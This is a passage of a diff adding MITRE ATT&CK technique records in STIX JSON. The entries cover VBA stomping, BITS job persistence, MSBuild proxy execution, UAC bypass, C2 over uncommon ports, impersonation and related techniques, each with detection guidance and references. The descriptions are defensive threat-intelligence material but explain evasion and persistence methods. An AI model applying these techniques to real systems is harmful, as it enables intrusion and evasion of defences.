(either native to the system or delivered by the adversary)" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "created": "2020-03-16T15:30:57.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/004", + "external_id": "T1027.004" + }, + { + "source_name": "ClearSky MuddyWater Nov 2018", + "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.", + "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf" + }, + { + "source_name": "TrendMicro WindowsAppMac", + "description": "Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads Info Stealer and Adware. Retrieved April 25, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Uncommonly Used Port", + "description": "Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0", + "created": "2017-05-31T21:30:53.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1065", + "external_id": "T1065" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "System Location Discovery", + "description": "\nAdversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)\n\nAdversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Pooja Natarajan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India", + "Wes Hurd", + "Katie Nickels, Red Canary" + ], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.(Citation: FBI Ragnar Locker 2020)\n\nMonitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", + "created": "2021-04-01T16:42:08.735Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1614", + "external_id": "T1614" + }, + { + "source_name": "FBI Ragnar Locker 2020", + "description": "FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.", + "url": "https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf" + }, + { + "source_name": "Sophos Geolocation 2016", + "description": "Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals target you based on where you live. Retrieved April 1, 2021.", + "url": "https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/" + }, + { + "source_name": "Bleepingcomputer RAT malware 2020", + "description": "Abrams, L. (2020, October 23). New RAT malware gets commands via Discord, has ransomware feature. Retrieved April 1, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/" + }, + { + "source_name": "AWS Instance Identity Documents", + "description": "Amazon. (n.d.). Instance identity documents. Retrieved April 2, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html" + }, + { + "source_name": "Microsoft Azure Instance Metadata 2021", + "description": "Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows" + }, + { + "source_name": "Securelist Trasparent Tribe 2020", + "description": "Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part 1. Retrieved April 1, 2021.", + "url": "https://securelist.com/transparent-tribe-part-1/98127/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "VBA Stomping", + "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Rick Cole, Mandiant" + ], + "x_mitre_detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_system_requirements": [ + "MS Office version specified in _VBA_PROJECT stream must match host" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "created": "2020-09-17T12:51:40.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/007", + "external_id": "T1564.007" + }, + { + "source_name": "FireEye VBA stomp Feb 2020", + "description": "Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html" + }, + { + "source_name": "Evil Clippy May 2019", + "description": "Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. Retrieved September 17, 2020.", + "url": "https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/" + }, + { + "source_name": "Microsoft _VBA_PROJECT Stream", + "description": "Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: Version Dependent Project Information. Retrieved September 18, 2020.", + "url": "https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239" + }, + { + "source_name": "Walmart Roberts Oct 2018", + "description": "Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping — Advanced Maldoc Techniques. Retrieved September 17, 2020.", + "url": "https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278" + }, + { + "source_name": "pcodedmp Bontchev", + "description": "Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.", + "url": "https://github.com/bontchev/pcodedmp" + }, + { + "source_name": "oletools toolkit", + "description": "decalage2. (2019, December 3). python-oletools. Retrieved September 18, 2020.", + "url": "https://github.com/decalage2/oletools" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "BITS Jobs", + "description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Brent Murphy, Elastic", + "David French, Elastic", + "Ricardo Dias", + "Red Canary" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Firewall", + "Host forensic analysis" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1197", + "external_id": "T1197" + }, + { + "source_name": "CTU BITS Malware June 2016", + "description": "Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.", + "url": "https://www.secureworks.com/blog/malware-lingers-with-bits" + }, + { + "source_name": "Symantec BITS May 2007", + "description": "Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018.", + "url": "https://www.symantec.com/connect/blogs/malware-update-windows-update" + }, + { + "source_name": "Elastic - Hunting for Persistence Part 1", + "description": "French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020.", + "url": "https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1" + }, + { + "source_name": "PaloAlto UBoatRAT Nov 2017", + "description": "Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/" + }, + { + "source_name": "Microsoft Issues with BITS July 2011", + "description": "Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.", + "url": "https://technet.microsoft.com/library/dd939934.aspx" + }, + { + "source_name": "Microsoft BITS", + "description": "Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx" + }, + { + "source_name": "Microsoft BITSAdmin", + "description": "Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.", + "url": "https://msdn.microsoft.com/library/aa362813.aspx" + }, + { + "source_name": "Microsoft COM", + "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" + }, + { + "source_name": "Mondok Windows PiggyBack BITS May 2007", + "description": "Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018.", + "url": "https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T19:23:58.317Z", + "name": "MSBuild", + "description": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n\nAdversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "@ionstorm", + "Carrie Roberts, @OrOneEqualsOne" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + ".NET Framework version 4 or higher" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", + "created": "2020-03-27T21:50:26.042Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1127/001", + "external_id": "T1127.001" + }, + { + "source_name": "LOLBAS Msbuild", + "description": "LOLBAS. (n.d.). Msbuild.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Msbuild/" + }, + { + "source_name": "Microsoft MSBuild Inline Tasks 2017", + "description": "Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.", + "url": "https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-inline-tasks?view=vs-2019#code-element" + }, + { + "source_name": "MSDN MSBuild", + "description": "Microsoft. (n.d.). MSBuild1. Retrieved November 30, 2016.", + "url": "https://msdn.microsoft.com/library/dd393574.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:10.962Z", + "name": "Hardcoded Credentials", + "description": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:\n\n* Username/Passwords\n* Cryptographic keys/Certificates\n* API tokens\n\nUnlike [Default Credentials](https://attack.mitre.org/techniques/T0812), these credentials are built into the system in a way that they either cannot be changed by the asset owner, or may be infeasible to change because of the impact it would cause to the control system operation. These credentials may be reused across whole product lines or device models and are often not published or known to the owner and operators of the asset. \n\nAdversaries may utilize these hardcoded credentials to move throughout the control system environment or provide reliable access for their tools to interact with industrial assets. \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Aagam Shah, @neutrinoguy, ABB" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Logon Session: Logon Session Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c9a8d958-fcdb-40d2-af4c-461c8031651a", + "created": "2022-09-29T13:35:38.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0891", + "external_id": "T0891" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-30T19:45:05.886Z", + "name": "Impersonation", + "description": "Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. \n \nIn many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.   \n \nImpersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)\n \nThere is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Pawel Partyka, Microsoft Threat Intelligence", + "Blake Strom, Microsoft Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", + "created": "2023-08-08T15:42:18.906Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1656", + "external_id": "T1656" + }, + { + "source_name": "CrowdStrike-BEC", + "description": "Bart Lenaerts-Bergmans. (2023, March 10). What is Business Email Compromise?. Retrieved August 8, 2023.", + "url": "https://www.crowdstrike.com/cybersecurity-101/business-email-compromise-bec/" + }, + { + "source_name": "VEC", + "description": "CloudFlare. (n.d.). What is vendor email compromise (VEC)?. Retrieved September 12, 2023.", + "url": "https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-02T22:17:54.968Z", + "name": "Modify Cloud Compute Configurations", + "description": "Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.\n\nFor example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Blake Strom, Microsoft Threat Intelligence", + "Amir Gharib, Microsoft Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f", + "created": "2023-09-05T14:19:17.486Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578/005", + "external_id": "T1578.005" + }, + { + "source_name": "Microsoft Subscription Hijacking 2022", + "description": "Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.", + "url": "https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121" + }, + { + "source_name": "Microsoft Cryptojacking 2023", + "description": "Microsoft Threat Intelligence. (2023, July 25). Cryptojacking: Understanding and defending against cloud compute resource abuse. Retrieved September 5, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/" + }, + { + "source_name": "Microsoft Peach Sandstorm 2023", + "description": "Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/" + }, + { + "source_name": "Microsoft Azure Policy", + "description": "Microsoft. (2023, August 30). Azure Policy built-in policy definitions. Retrieved September 5, 2023.", + "url": "https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Bypass User Account Control", + "description": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs are allowed to elevate privileges or execute some elevated COM objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of rundll32.exe to load a specifically crafted DLL which loads an auto-elevated COM object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user. (Citation: Davidson Windows) Adversaries can use these techniques to elevate privileges to administrator if the target process is unprotected.\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACMe contains an extensive list of methods (Citation: Github UACMe) that have been discovered and implemented within 